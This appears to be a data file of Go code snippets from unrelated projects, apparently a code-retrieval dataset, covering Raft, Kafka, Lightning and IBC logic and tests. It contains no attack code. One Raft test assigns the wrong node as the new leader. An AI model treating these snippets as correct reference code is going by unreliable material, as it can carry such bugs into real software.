commitment tx: \"+\n\t\t\t\t\"expected %s, got %s\", i, spew.Sdump(expectedCommitmentTx),\n\t\t\t\tspew.Sdump(commitTx))\n\t\t\tcontinue\n\t\t}\n\n\t\t// Generate second-level HTLC transactions for HTLCs in\n\t\t// commitment tx.\n\t\thtlcResolutions, err := extractHtlcResolutions(\n\t\t\tchainfee.SatPerKWeight(test.commitment.FeePerKw), true,\n\t\t\tsigner, htlcs, keys, &channel.channelState.LocalChanCfg,\n\t\t\t&channel.channelState.RemoteChanCfg, commitTx.TxHash(),\n\t\t\tchannel.channelState.ChanType,\n\t\t)\n\t\tif err != nil {\n\t\t\tt.Errorf(\"Case %d: Failed to extract HTLC resolutions: %v\", i, err)\n\t\t\tcontinue\n\t\t}\n\n\t\tresolutionIdx := 0\n\t\tfor j, htlcDesc := range test.htlcDescs {\n\t\t\t// TODO: Check HTLC success transactions; currently not implemented.\n\t\t\t// resolutionIdx can be replaced by j when this is handled.\n\t\t\tif htlcs[j].Incoming {\n\t\t\t\tcontinue\n\t\t\t}\n\n\t\t\texpectedTx, err := txFromHex(htlcDesc.resolutionTxHex)\n\t\t\tif err != nil {\n\t\t\t\tt.Fatalf(\"Failed to parse serialized tx: %v\", err)\n\t\t\t}\n\n\t\t\thtlcResolution := htlcResolutions.OutgoingHTLCs[resolutionIdx]\n\t\t\tresolutionIdx++\n\n\t\t\tactualTx := htlcResolution.SignedTimeoutTx\n\t\t\tif actualTx == nil {\n\t\t\t\tt.Errorf(\"Case %d: Failed to generate second level tx: \"+\n\t\t\t\t\t\"output %d, %v\", i, j,\n\t\t\t\t\thtlcResolutions.OutgoingHTLCs[j])\n\t\t\t\tcontinue\n\t\t\t}\n\n\t\t\t// Check that second-level HTLC transaction was created correctly.\n\t\t\tif actualTx.WitnessHash() != *expectedTx.WitnessHash() {\n\t\t\t\tt.Errorf(\"Case %d: Generated unexpected second level tx: \"+\n\t\t\t\t\t\"output %d, expected %s, got %s\", i, j,\n\t\t\t\t\texpectedTx.WitnessHash(), actualTx.WitnessHash())\n\t\t\t\tcontinue\n\t\t\t}\n\t\t}\n\t}\n}", "func TestRaftRemoveLeader(t *testing.T) {\n\tID1 := \"1\"\n\tID2 := \"2\"\n\tID3 := \"3\"\n\tclusterPrefix := \"TestRaftRemoveLeader\"\n\n\t// Create n1 node.\n\tfsm1 := newTestFSM(ID1)\n\tn1 := testCreateRaftNode(getTestConfig(ID1, clusterPrefix+ID1), newStorage())\n\t// Create n2.\n\tfsm2 := newTestFSM(ID2)\n\tn2 := testCreateRaftNode(getTestConfig(ID2, clusterPrefix+ID2), newStorage())\n\t// Create n3.\n\tfsm3 := newTestFSM(ID3)\n\tn3 := testCreateRaftNode(getTestConfig(ID3, clusterPrefix+ID3), newStorage())\n\n\tconnectAllNodes(n1, n2, n3)\n\n\t// The cluster starts with only one node -- n1.\n\tn1.Start(fsm1)\n\tn1.ProposeInitialMembership([]string{ID1})\n\n\t// Wait it becomes to leader.\n\t<-fsm1.leaderCh\n\n\t// Add n2 to the cluster.\n\tpending := n1.AddNode(ID2)\n\tn2.Start(fsm2)\n\t// Wait until n2 gets joined.\n\t<-pending.Done\n\n\t// Add n3 to the cluster.\n\tpending = n1.AddNode(ID3)\n\tn3.Start(fsm3)\n\t// Wait until n3 gets joined.\n\t<-pending.Done\n\n\t// Now we have a cluster with 3 nodes and n1 as the leader.\n\n\t// Remove the leader itself.\n\tn1.RemoveNode(ID1)\n\n\t// A new leader should be elected in new configuration(n2, n3).\n\tvar newLeader *Raft\n\tselect {\n\tcase <-fsm2.leaderCh:\n\t\tnewLeader = n2\n\tcase <-fsm3.leaderCh:\n\t\tnewLeader = n1\n\t}\n\n\tnewLeader.Propose([]byte(\"data1\"))\n\tnewLeader.Propose([]byte(\"data2\"))\n\tnewLeader.Propose([]byte(\"data3\"))\n\n\t// Now n2 and n3 should commit newly proposed entries eventually>\n\tif !testEntriesEqual(fsm2.appliedCh, fsm3.appliedCh, 3) {\n\t\tt.Fatal(\"two FSMs in same group applied different sequence of commands.\")\n\t}\n}", "func (s *server) processAppendEntriesResponse(resp *AppendEntriesResponse) {\n\t// If we find a higher term then change to a follower and exit.\n\tif resp.Term() > s.Term() {\n\t\ts.updateCurrentTerm(resp.Term(), \"\")\n\t\treturn\n\t}\n\n\t// panic response if it's not successful.\n\tif !resp.Success() {\n\t\treturn\n\t}\n\n\t// if one peer successfully append a log from the leader term,\n\t// we add it to the synced list\n\tif resp.append == true {\n\t\tfmt.Println(s.syncedPeer)\n\t\tfmt.Println(resp.peer, \"->\", s.syncedPeer[resp.peer])\n\t\ts.syncedPeer[resp.peer] = true\n\t\tfmt.Println(resp.peer, \"->\", s.syncedPeer[resp.peer])\n\t}\n\n\t// Increment the commit count to make sure we have a quorum before committing.\n\tif len(s.syncedPeer) < s.QuorumSize() {\n\t\treturn\n\t}\n\n\t// Determine the committed index that a majority has.\n\tvar indices []uint64\n\tindices = append(indices, s.log.currentIndex())\n\tfor _, peer := range s.peers {\n\t\tindices = append(indices, peer.getPrevLogIndex())\n\t}\n\tsort.Sort(sort.Reverse(uint64Slice(indices)))\n\n\t// We can commit up to the index which the majority of the members have appended.\n\tcommitIndex := indices[s.QuorumSize()-1]\n\tcommittedIndex := s.log.commitIndex\n\n\tif commitIndex > committedIndex {\n\t\t// leader needs to do a fsync before committing log entries\n\t\ts.log.sync()\n\t\ts.log.setCommitIndex(commitIndex)\n\t\ts.debugln(\"commit index \", commitIndex)\n\t}\n}", "func TestFileEntry(t *testing.T) {\n\tstores := []struct {\n\t\tname string\n\t\tfixture func() (bundle *fileEntryTestBundle, cleanup func())\n\t}{\n\t\t{\"LocalFileEntry\", fileEntryLocalFixture},\n\t}\n\n\ttests := []func(require *require.Assertions, bundle *fileEntryTestBundle){\n\t\ttestCreate,\n\t\ttestCreateExisting,\n\t\ttestCreateFail,\n\t\ttestMoveFrom,\n\t\ttestMoveFromExisting,\n\t\ttestMoveFromWrongState,\n\t\ttestMoveFromWrongSourcePath,\n\t\ttestMove,\n\t\ttestLinkTo,\n\t\ttestDelete,\n\t\ttestDeleteFailsForPersistedFile,\n\t\ttestGetMetadataAndSetMetadata,\n\t\ttestGetMetadataFail,\n\t\ttestSetMetadataAt,\n\t\ttestGetOrSetMetadata,\n\t\ttestDeleteMetadata,\n\t\ttestRangeMetadata,\n\t}\n\n\tfor _, store := range stores {\n\t\tt.Run(store.name, func(t *testing.T) {\n\t\t\tfor _, test := range tests {\n\t\t\t\ttestName := runtime.FuncForPC(reflect.ValueOf(test).Pointer()).Name()\n\t\t\t\tparts := strings.Split(testName, \".\")\n\t\t\t\tt.Run(parts[len(parts)-1], func(t *testing.T) {\n\t\t\t\t\trequire := require.New(t)\n\t\t\t\t\ts, cleanup := store.fixture()\n\t\t\t\t\tdefer cleanup()\n\t\t\t\t\ttest(require, s)\n\t\t\t\t})\n\t\t\t}\n\t\t})\n\t}\n}", "func TestValidFileContractRevisions(t *testing.T) {\n\tif testing.Short() {\n\t\t// t.SkipNow()\n\t}\n\tcst, err := createConsensusSetTester(\"TestValidStorageProofs\")\n\tif err != nil {\n\t\tt.Fatal(err)\n\t}\n\n\t// Grab an address + unlock conditions for the transaction.\n\tunlockHash, unlockConditions, err := cst.wallet.CoinAddress(false)\n\tif err != nil {\n\t\tt.Fatal(err)\n\t}\n\n\t// Create a file contract for which a storage proof can be created.\n\tvar fcid types.FileContractID\n\tfcid[0] = 12\n\tsimFile := make([]byte, 64*1024)\n\trand.Read(simFile)\n\tbuffer := bytes.NewReader(simFile)\n\troot, err := crypto.ReaderMerkleRoot(buffer)\n\tif err != nil {\n\t\tt.Fatal(err)\n\t}\n\tfc := types.FileContract{\n\t\tFileSize: 64 * 1024,\n\t\tFileMerkleRoot: root,\n\t\tWindowStart: 102,\n\t\tWindowEnd: 1200,\n\t\tUnlockHash: unlockHash,\n\t\tRevisionNumber: 1,\n\t}\n\tcst.cs.fileContracts[fcid] = fc\n\n\t// Try a working file contract revision.\n\ttxn := types.Transaction{\n\t\tFileContractRevisions: []types.FileContractRevision{\n\t\t\t{\n\t\t\t\tParentID: fcid,\n\t\t\t\tUnlockConditions: unlockConditions,\n\t\t\t\tNewRevisionNumber: 2,\n\t\t\t},\n\t\t},\n\t}\n\terr = cst.cs.validFileContractRevisions(txn)\n\tif err != nil {\n\t\tt.Error(err)\n\t}\n\n\t// Try a transaction with an insufficient revision number.\n\ttxn = types.Transaction{\n\t\tFileContractRevisions: []types.FileContractRevision{\n\t\t\t{\n\t\t\t\tParentID: fcid,\n\t\t\t\tUnlockConditions: unlockConditions,\n\t\t\t\tNewRevisionNumber: 1,\n\t\t\t},\n\t\t},\n\t}\n\terr = cst.cs.validFileContractRevisions(txn)\n\tif err != ErrLowRevisionNumber {\n\t\tt.Error(err)\n\t}\n\ttxn = types.Transaction{\n\t\tFileContractRevisions: []types.FileContractRevision{\n\t\t\t{\n\t\t\t\tParentID: fcid,\n\t\t\t\tUnlockConditions: unlockConditions,\n\t\t\t\tNewRevisionNumber: 0,\n\t\t\t},\n\t\t},\n\t}\n\terr = cst.cs.validFileContractRevisions(txn)\n\tif err != ErrLowRevisionNumber {\n\t\tt.Error(err)\n\t}\n}", "func (_RandomBeacon *RandomBeaconSession) SubmitRelayEntry(entry []byte, groupMembers []uint32) (*types.Transaction, error) {\n\treturn _RandomBeacon.Contract.SubmitRelayEntry(&_RandomBeacon.TransactOpts, entry, groupMembers)\n}", "func TestParseCommitData(t *testing.T) {\n\tstr := \"tree 47e960bd3b10e549716c31badb1fc06aacd708e1\\n\" +\n\t\t\"author Artiom <[email protected]> 1379666165 +0300\" +\n\t\t\"committer Artiom <[email protected]> 1379666165 +0300\\n\\n\" +\n\t\t\"if case if ClientForAction will return error, client can absent (be nil)\\n\\n\" +\n\t\t\"Conflicts:\\n\" +\n\t\t\"\tapp/class.js\\n\"\n\n\tcommit, _ := parseCommitData([]byte(str))\n\n\tif commit.treeId.String() != \"47e960bd3b10e549716c31badb1fc06aacd708e1\" {\n\t\tt.Fatalf(\"Got bad tree %s\", commit.treeId)\n\t}\n}", "func (c *offsetCoordinator) commit(\n\ttopic string, partition int32, offset int64, metadata string) (resErr error) {\n\t// Eliminate the scenario where Kafka erroneously returns -1 as the offset\n\t// which then gets made permanent via an immediate flush.\n\t//\n\t// Technically this disallows a valid use case of rewinding a consumer\n\t// group to the beginning, but 1) this isn't possible through any API we\n\t// currently expose since you cannot have a message numbered -1 in hand;\n\t// 2) this restriction only applies to partitions with a non-expired\n\t// message at offset 0.\n\tif offset < 0 {\n\t\treturn fmt.Errorf(\"Cannot commit negative offset %d for [%s:%d].\",\n\t\t\toffset, topic, partition)\n\t}\n\n\tretry := &backoff.Backoff{Min: c.conf.RetryErrWait, Jitter: true}\n\tfor try := 0; try < c.conf.RetryErrLimit; try++ {\n\t\tif try != 0 {\n\t\t\ttime.Sleep(retry.Duration())\n\t\t}\n\n\t\t// get a copy of our connection with the lock, this might establish a new\n\t\t// connection so can take a bit\n\t\tconn, err := c.broker.coordinatorConnection(c.conf.ConsumerGroup)\n\t\tif conn == nil {\n\t\t\tresErr = err\n\t\t\tcontinue\n\t\t}\n\t\tdefer func(lconn *connection) { go c.broker.conns.Idle(lconn) }(conn)\n\n\t\tresp, err := conn.OffsetCommit(&proto.OffsetCommitReq{\n\t\t\tClientID: c.broker.conf.ClientID,\n\t\t\tConsumerGroup: c.conf.ConsumerGroup,\n\t\t\tTopics: []proto.OffsetCommitReqTopic{\n\t\t\t\t{\n\t\t\t\t\tName: topic,\n\t\t\t\t\tPartitions: []proto.OffsetCommitReqPartition{\n\t\t\t\t\t\t{ID: partition, Offset: offset, Metadata: metadata},\n\t\t\t\t\t},\n\t\t\t\t},\n\t\t\t},\n\t\t})\n\t\tresErr = err\n\n\t\tif _, ok := err.(*net.OpError); ok || err == io.EOF || err == syscall.EPIPE {\n\t\t\tlog.Debugf(\"connection died while committing on %s:%d for %s: %s\",\n\t\t\t\ttopic, partition, c.conf.ConsumerGroup, err)\n\t\t\t_ = conn.Close()\n\n\t\t} else if err == nil {\n\t\t\t// Should be a single response in the payload.\n\t\t\tfor _, t := range resp.Topics {\n\t\t\t\tfor _, p := range t.Partitions {\n\t\t\t\t\tif t.Name != topic || p.ID != partition {\n\t\t\t\t\t\tlog.Warningf(\"commit response with unexpected data for %s:%d\",\n\t\t\t\t\t\t\tt.Name, p.ID)\n\t\t\t\t\t\tcontinue\n\t\t\t\t\t}\n\t\t\t\t\treturn p.Err\n\t\t\t\t}\n\t\t\t}\n\t\t\treturn errors.New(\"response does not contain commit information\")\n\t\t}\n\t}\n\treturn resErr\n}", "func (s ReplicaServer) AppendEntry(ctx context.Context, req *proto.AppendEntryReq) (*proto.AppendEntryResp, error) {\n\ts.R.mu.Lock()\n\tdefer s.R.mu.Unlock()\n\n\tif req.Term >= s.R.term {\n\t\ts.R.term = req.Term\n\t\ts.R.lastPinged = time.Now()\n\t\ts.R.setLeader(req.Id)\n\t\ts.R.lastCommit = req.LastCommit\n\t\ts.R.execute()\n\n\t\t// Check if preceding entry exists first, unless first entry\n\t\tif req.PreIndex == -1 || (req.PreIndex < int64(len(s.R.log)) && s.R.log[req.PreIndex].Term == req.PreTerm) {\n\t\t\t// Append entries to log\n\t\t\tentries := req.Entries\n\n\t\t\tif len(entries) == 0 {\n\t\t\t\t// Replica up to date\n\t\t\t\treturn &proto.AppendEntryResp{Ok: true}, nil\n\t\t\t}\n\n\t\t\tsort.Slice(entries, func(i, j int) bool { return entries[i].Index < entries[j].Index })\n\n\t\t\tnumNeed := entries[len(entries)-1].Index + 1 - int64(len(s.R.log))\n\t\t\tif numNeed > 0 {\n\t\t\t\ts.R.log = append(s.R.log, make([]*proto.Entry, numNeed)...)\n\t\t\t}\n\t\t\tfor _, e := range entries {\n\t\t\t\ts.R.log[e.Index] = e\n\t\t\t}\n\n\t\t\treturn &proto.AppendEntryResp{Ok: true}, nil\n\t\t}\n\t}\n\treturn &proto.AppendEntryResp{Ok: false}, nil\n}", "func TestCommitConflictRollback4A(t *testing.T) {\n}", "func TestFollowerAppendEntries(t *testing.T) {\n\ttests := []struct {\n\t\tindex, term uint64\n\t\tents []pb.Entry\n\t\twents []pb.Entry\n\t\twunstable []pb.Entry\n\t}{\n\t\t{\n\t\t\t2, 2,\n\t\t\t[]pb.Entry{{Term: 3, Index: 3}},\n\t\t\t[]pb.Entry{{Term: 1, Index: 1}, {Term: 2, Index: 2}, {Term: 3, Index: 3}},\n\t\t\t[]pb.Entry{{Term: 3, Index: 3}},\n\t\t},\n\t\t{\n\t\t\t1, 1,\n\t\t\t[]pb.Entry{{Term: 3, Index: 2}, {Term: 4, Index: 3}},\n\t\t\t[]pb.Entry{{Term: 1, Index: 1}, {Term: 3, Index: 2}, {Term: 4, Index: 3}},\n\t\t\t[]pb.Entry{{Term: 3, Index: 2}, {Term: 4, Index: 3}},\n\t\t},\n\t\t{\n\t\t\t0, 0,\n\t\t\t[]pb.Entry{{Term: 1, Index: 1}},\n\t\t\t[]pb.Entry{{Term: 1, Index: 1}, {Term: 2, Index: 2}},\n\t\t\tnil,\n\t\t},\n\t\t{\n\t\t\t0, 0,\n\t\t\t[]pb.Entry{{Term: 3, Index: 1}},\n\t\t\t[]pb.Entry{{Term: 3, Index: 1}},\n\t\t\t[]pb.Entry{{Term: 3, Index: 1}},\n\t\t},\n\t}\n\tfor i, tt := range tests {\n\t\tstorage := NewMemoryStorage()\n\t\tstorage.Append([]pb.Entry{{Term: 1, Index: 1}, {Term: 2, Index: 2}})\n\t\tr := newTestRaft(1, []uint64{1, 2, 3}, 10, 1, storage)\n\t\tdefer closeAndFreeRaft(r)\n\t\tr.becomeFollower(2, 2)\n\n\t\tr.Step(pb.Message{From: 2, To: 1, Type: pb.MsgApp, Term: 2, LogTerm: tt.term, Index: tt.index, Entries: tt.ents})\n\n\t\tif g := r.raftLog.allEntries(); !reflect.DeepEqual(g, tt.wents) {\n\t\t\tt.Errorf(\"#%d: ents = %+v, want %+v\", i, g, tt.wents)\n\t\t}\n\t\tif g := r.raftLog.unstableEntries(); !reflect.DeepEqual(g, tt.wunstable) {\n\t\t\tt.Errorf(\"#%d: unstableEnts = %+v, want %+v\", i, g, tt.wunstable)\n\t\t}\n\t}\n}", "func (cfg *ConsensusConfiguration) Commit(t time.Time) time.Time {\n\treturn t.Add(cfg.TimeoutCommit)\n}", "func (r *Ring) CommittableCount() int { return r.numCommittable }", "func (suite *KeeperTestSuite) TestGetAllPacketCommitmentsAtChannel() {\n\tpath := tibctesting.NewPath(suite.chainA, suite.chainB)\n\tsuite.coordinator.SetupClients(path)\n\n\tctxA := suite.chainA.GetContext()\n\texpectedSeqs := make(map[uint64]bool)\n\thash := []byte(\"commitment\")\n\n\tseq := uint64(15)\n\tmaxSeq := uint64(25)\n\tsuite.Require().Greater(maxSeq, seq)\n\n\t// create consecutive commitments\n\tfor i := uint64(1); i < seq; i++ {\n\t\tsuite.chainA.App.TIBCKeeper.PacketKeeper.SetPacketCommitment(ctxA, path.EndpointA.ChainName, path.EndpointB.ChainName, i, hash)\n\t\texpectedSeqs[i] = true\n\t}\n\n\t// add non-consecutive commitments\n\tfor i := seq; i < maxSeq; i += 2 {\n\t\tsuite.chainA.App.TIBCKeeper.PacketKeeper.SetPacketCommitment(ctxA, path.EndpointA.ChainName, path.EndpointB.ChainName, i, hash)\n\t\texpectedSeqs[i] = true\n\t}\n\n\t// add sequence on different channel/port\n\tsuite.chainA.App.TIBCKeeper.PacketKeeper.SetPacketCommitment(ctxA, path.EndpointA.ChainName, \"EndpointBChainName\", maxSeq+1, hash)\n\n\tcommitments := suite.chainA.App.TIBCKeeper.PacketKeeper.GetAllPacketCommitmentsAtChannel(ctxA, path.EndpointA.ChainName, path.EndpointB.ChainName)\n\n\tsuite.Equal(len(expectedSeqs), len(commitments))\n\t// ensure above for loops occurred\n\tsuite.NotEqual(0, len(commitments))\n\n\t// verify that all the packet commitments were stored\n\tfor _, packet := range commitments {\n\t\tsuite.True(expectedSeqs[packet.Sequence])\n\t\tsuite.Equal(path.EndpointA.ChainName, packet.SourceChain)\n\t\tsuite.Equal(path.EndpointB.ChainName, packet.DestinationChain)\n\t\tsuite.Equal(hash, packet.Data)\n\n\t\t// prevent duplicates from passing checks\n\t\texpectedSeqs[packet.Sequence] = false\n\t}\n}", "func (s *Store) HandleLeaderChange(leader uint64) {\n\ts.Lock()\n\n\tif s.Leader != leader {\n\t\tlog.Debug(\"partition[%d] change leader from %d to %d\", s.Meta.ID, s.Leader, leader)\n\n\t\ts.Leader = leader\n\t\ts.LeaderAddr = \"\"\n\t\tfor _, repl := range s.Meta.Replicas {\n\t\t\tif uint64(repl.NodeID) == s.Leader {\n\t\t\t\ts.LeaderAddr = repl.RpcAddr\n\t\t\t\tbreak\n\t\t\t}\n\t\t}\n\n\t\t_, term := s.RaftServer.LeaderTerm(s.Meta.ID)\n\t\tif s.Meta.Epoch.Version < term {\n\t\t\ts.Meta.Epoch.Version = term\n\t\t}\n\n\t\tif leader == uint64(s.NodeID) {\n\t\t\ts.Meta.Status = metapb.PA_READWRITE\n\t\t\ts.EventListener.HandleRaftLeaderEvent(&RaftLeaderEvent{Store: s})\n\t\t} else {\n\t\t\ts.Meta.Status = metapb.PA_READONLY\n\t\t}\n\t}\n\n\ts.Unlock()\n\treturn\n}", "func Test_releaseLock_Update(t *testing.T) {\n\ttests := []struct {\n\t\tname string\n\t\tf func(t *testing.T, internalClient *kubefake.Clientset, isLeader *isLeaderTracker, cancel context.CancelFunc)\n\t}{\n\t\t{\n\t\t\tname: \"renewal fails on update\",\n\t\t\tf: func(t *testing.T, internalClient *kubefake.Clientset, isLeader *isLeaderTracker, cancel context.CancelFunc) {\n\t\t\t\tinternalClient.PrependReactor(\"update\", \"*\", func(action kubetesting.Action) (handled bool, ret runtime.Object, err error) {\n\t\t\t\t\tlease := action.(kubetesting.UpdateAction).GetObject().(*coordinationv1.Lease)\n\t\t\t\t\tif len(ptr.Deref(lease.Spec.HolderIdentity, \"\")) == 0 {\n\t\t\t\t\t\trequire.False(t, isLeader.canWrite(), \"client must release in-memory leader status before Kube API call\")\n\t\t\t\t\t}\n\t\t\t\t\treturn true, nil, errors.New(\"cannot renew\")\n\t\t\t\t})\n\t\t\t},\n\t\t},\n\t\t{\n\t\t\tname: \"renewal fails due to context\",\n\t\t\tf: func(t *testing.T, internalClient *kubefake.Clientset, isLeader *isLeaderTracker, cancel context.CancelFunc) {\n\t\t\t\tt.Cleanup(func() {\n\t\t\t\t\trequire.False(t, isLeader.canWrite(), \"client must release in-memory leader status when context is canceled\")\n\t\t\t\t})\n\t\t\t\tstart := time.Now()\n\t\t\t\tinternalClient.PrependReactor(\"update\", \"*\", func(action kubetesting.Action) (handled bool, ret runtime.Object, err error) {\n\t\t\t\t\t// keep going for a bit\n\t\t\t\t\tif time.Since(start) < 5*time.Second {\n\t\t\t\t\t\treturn false, nil, nil\n\t\t\t\t\t}\n\n\t\t\t\t\tcancel()\n\t\t\t\t\treturn false, nil, nil\n\t\t\t\t})\n\t\t\t},\n\t\t},\n\t}\n\tfor _, tt := range tests {\n\t\ttt := tt\n\t\tt.Run(tt.name, func(t *testing.T) {\n\t\t\tt.Parallel()\n\n\t\t\tinternalClient := kubefake.NewSimpleClientset()\n\t\t\tisLeader := &isLeaderTracker{tracker: &atomic.Bool{}}\n\n\t\t\tleaderElectorCtx, cancel := context.WithCancel(context.Background())\n\n\t\t\ttt.f(t, internalClient, isLeader, cancel)\n\n\t\t\tleaderElectionConfig := newLeaderElectionConfig(\"ns-001\", \"lease-001\", \"foo-001\", internalClient, isLeader)\n\n\t\t\t// make the tests run quicker\n\t\t\tleaderElectionConfig.LeaseDuration = 2 * time.Second\n\t\t\tleaderElectionConfig.RenewDeadline = 1 * time.Second\n\t\t\tleaderElectionConfig.RetryPeriod = 250 * time.Millisecond\n\n\t\t\t// note that this will block until it exits on its own or tt.f calls cancel()\n\t\t\tleaderelection.RunOrDie(leaderElectorCtx, leaderElectionConfig)\n\t\t})\n\t}\n}", "func (h *KVHandler) Commit() error {\n\tdefer func() {\n\t\th.KVTxnOps = nil\n\t}()\n\tvar kvTxnOps = h.KVTxnOps\n\t//move modify index check to the end\n\tif h.KVTxnOps[0].Verb == api.KVCheckIndex {\n\t\tlength := len(h.KVTxnOps)\n\t\tkvTxnOps = append(h.KVTxnOps[1:length-1], h.KVTxnOps[0], h.KVTxnOps[length-1])\n\t}\n\tfor _, slice := range h.splitIntoSlices(kvTxnOps, consulTxnSize) {\n\t\terr := h.executeTransaction(slice)\n\t\tif err != nil {\n\t\t\treturn err\n\t\t}\n\t}\n\treturn nil\n}", "func submitEntryToAnchorChain(aRecord *AnchorRecord) error {\n\n\t//Marshal aRecord into json\n\tjsonARecord, err := json.Marshal(aRecord)\n\tanchorLog.Debug(\"submitEntryToAnchorChain - jsonARecord: \", string(jsonARecord))\n\tif err != nil {\n\t\treturn err\n\t}\n\tbufARecord := new(bytes.Buffer)\n\tbufARecord.Write(jsonARecord)\n\t//Sign the json aRecord with the server key\n\taRecordSig := serverPrivKey.Sign(jsonARecord)\n\t//Encode sig into Hex string\n\tbufARecord.Write([]byte(hex.EncodeToString(aRecordSig.Sig[:])))\n\n\t//Create a new entry\n\tentry := common.NewEntry()\n\tentry.ChainID = anchorChainID\n\tanchorLog.Debug(\"anchorChainID: \", anchorChainID)\n\tentry.Content = bufARecord.Bytes()\n\n\tbuf := new(bytes.Buffer)\n\t// 1 byte version\n\tbuf.Write([]byte{0})\n\t// 6 byte milliTimestamp (truncated unix time)\n\tbuf.Write(milliTime())\n\t// 32 byte Entry Hash\n\tbuf.Write(entry.Hash().Bytes())\n\t// 1 byte number of entry credits to pay\n\tbinaryEntry, err := entry.MarshalBinary()\n\tif err != nil {\n\t\treturn err\n\t}\n\n\tanchorLog.Info(\"jsonARecord binary entry: \", hex.EncodeToString(binaryEntry))\n\tif c, err := util.EntryCost(binaryEntry); err != nil {\n\t\treturn err\n\t} else {\n\t\tbuf.WriteByte(byte(c))\n\t}\n\ttmp := buf.Bytes()\n\tsig := serverECKey.Sign(tmp)\n\tbuf = bytes.NewBuffer(tmp)\n\tbuf.Write(serverECKey.Pub.Key[:])\n\tbuf.Write(sig.Sig[:])\n\n\tcommit := common.NewCommitEntry()\n\terr = commit.UnmarshalBinary(buf.Bytes())\n\tif err != nil {\n\t\treturn err\n\t}\n\n\t// create a CommitEntry msg and send it to the local inmsgQ\n\tcm := factomwire.NewMsgCommitEntry()\n\tcm.CommitEntry = commit\n\tinMsgQ <- cm\n\n\t// create a RevealEntry msg and send it to the local inmsgQ\n\trm := factomwire.NewMsgRevealEntry()\n\trm.Entry = entry\n\tinMsgQ <- rm\n\n\treturn nil\n}", "func (f *FakeOutput) ExpectEntry(t testing.TB, expected *entry.Entry) {\n\tselect {\n\tcase e := <-f.Received:\n\t\trequire.Equal(t, expected, e)\n\tcase <-time.After(time.Second):\n\t\trequire.FailNow(t, \"Timed out waiting for entry\")\n\t}\n}", "func (m *MockFullNode) VerifyEntry(arg0, arg1 *types0.BeaconEntry, arg2 abi.ChainEpoch) bool {\n\tm.ctrl.T.Helper()\n\tret := m.ctrl.Call(m, \"VerifyEntry\", arg0, arg1, arg2)\n\tret0, _ := ret[0].(bool)\n\treturn ret0\n}", "func (c *KafkaClient) CommitOffset(group string, topic string, partition int32, offset int64) error {\n\tfor i := 0; i <= c.config.CommitOffsetRetries; i++ {\n\t\terr := c.tryCommitOffset(group, topic, partition, offset)\n\t\tif err == nil {\n\t\t\treturn nil\n\t\t}\n\n\t\tlog.Debugf(\"Failed to commit offset %d for group %s, topic %s, partition %d after %d try: %s\", offset, group, topic, partition, i, err)\n\t\ttime.Sleep(c.config.CommitOffsetBackoff)\n\t}\n\n\treturn fmt.Errorf(\"Could not get commit offset %d for group %s, topic %s, partition %d after %d retries\", offset, group, topic, partition, c.config.CommitOffsetRetries)\n}", "func (s *raftServer) initLeader(followers []int) (*utils.SyncIntIntMap, *utils.SyncIntIntMap, *utils.SyncIntIntMap) {\n\tnextIndex := utils.CreateSyncIntMap()\n\tmatchIndex := utils.CreateSyncIntMap()\n\taeToken := utils.CreateSyncIntMap() // acts like mutex in producer-consumer\n\tnextLogEntry := s.localLog.TailIndex() + 1\n\tfor _, f := range followers {\n\t\tnextIndex.Set(f, nextLogEntry)\n\t\tmatchIndex.Set(f, 0)\n\t\taeToken.Set(f, 1)\n\t}\n\treturn nextIndex, matchIndex, aeToken\n}", "func (m *multiNode) Commit(index int64) {\n\tm.committed[index&m.mask] = int32(index >> m.shift)\n}", "func (s) TestSuccessCaseLeafNodeThenNewUpdate(t *testing.T) {\n\ttests := []struct {\n\t\tname string\n\t\tclusterName string\n\t\tclusterUpdate xdsresource.ClusterUpdate\n\t\tnewClusterUpdate xdsresource.ClusterUpdate\n\t}{\n\t\t{name: \"test-update-root-cluster-then-new-update-EDS-success\",\n\t\t\tclusterName: edsService,\n\t\t\tclusterUpdate: xdsresource.ClusterUpdate{\n\t\t\t\tClusterType: xdsresource.ClusterTypeEDS,\n\t\t\t\tClusterName: edsService,\n\t\t\t},\n\t\t\tnewClusterUpdate: xdsresource.ClusterUpdate{\n\t\t\t\tClusterType: xdsresource.ClusterTypeEDS,\n\t\t\t\tClusterName: edsService2,\n\t\t\t},\n\t\t},\n\t\t{\n\t\t\tname: \"test-update-root-cluster-then-new-update-Logical-DNS-success\",\n\t\t\tclusterName: logicalDNSService,\n\t\t\tclusterUpdate: xdsresource.ClusterUpdate{\n\t\t\t\tClusterType: xdsresource.ClusterTypeLogicalDNS,\n\t\t\t\tClusterName: logicalDNSService,\n\t\t\t},\n\t\t\tnewClusterUpdate: xdsresource.ClusterUpdate{\n\t\t\t\tClusterType: xdsresource.ClusterTypeLogicalDNS,\n\t\t\t\tClusterName: logicalDNSService2,\n\t\t\t},\n\t\t},\n\t}\n\n\tfor _, test := range tests {\n\t\tt.Run(test.name, func(t *testing.T) {\n\t\t\tch, fakeClient := setupTests()\n\t\t\tch.updateRootCluster(test.clusterName)\n\t\t\tctx, ctxCancel := context.WithTimeout(context.Background(), defaultTestTimeout)\n\t\t\tdefer ctxCancel()\n\t\t\t_, err := fakeClient.WaitForWatchCluster(ctx)\n\t\t\tif err != nil {\n\t\t\t\tt.Fatalf(\"xdsClient.WatchCDS failed with error: %v\", err)\n\t\t\t}\n\t\t\tfakeClient.InvokeWatchClusterCallback(test.clusterUpdate, nil)\n\t\t\tselect {\n\t\t\tcase <-ch.updateChannel:\n\t\t\tcase <-ctx.Done():\n\t\t\t\tt.Fatal(\"Timed out waiting for update from updateChannel.\")\n\t\t\t}\n\n\t\t\t// Check that sending the same cluster update also induces an update\n\t\t\t// to be written to update buffer.\n\t\t\tfakeClient.InvokeWatchClusterCallback(test.clusterUpdate, nil)\n\t\t\tshouldNotHappenCtx, shouldNotHappenCtxCancel := context.WithTimeout(context.Background(), defaultTestShortTimeout)\n\t\t\tdefer shouldNotHappenCtxCancel()\n\t\t\tselect {\n\t\t\tcase <-ch.updateChannel:\n\t\t\tcase <-shouldNotHappenCtx.Done():\n\t\t\t\tt.Fatal(\"Timed out waiting for update from updateChannel.\")\n\t\t\t}\n\n\t\t\t// Above represents same thing as the simple\n\t\t\t// TestSuccessCaseLeafNode, extra behavior + validation (clusterNode\n\t\t\t// which is a leaf receives a changed clusterUpdate, which should\n\t\t\t// ping clusterHandler, which should then write to the update\n\t\t\t// buffer).\n\t\t\tfakeClient.InvokeWatchClusterCallback(test.newClusterUpdate, nil)\n\t\t\tselect {\n\t\t\tcase chu := <-ch.updateChannel:\n\t\t\t\tif diff := 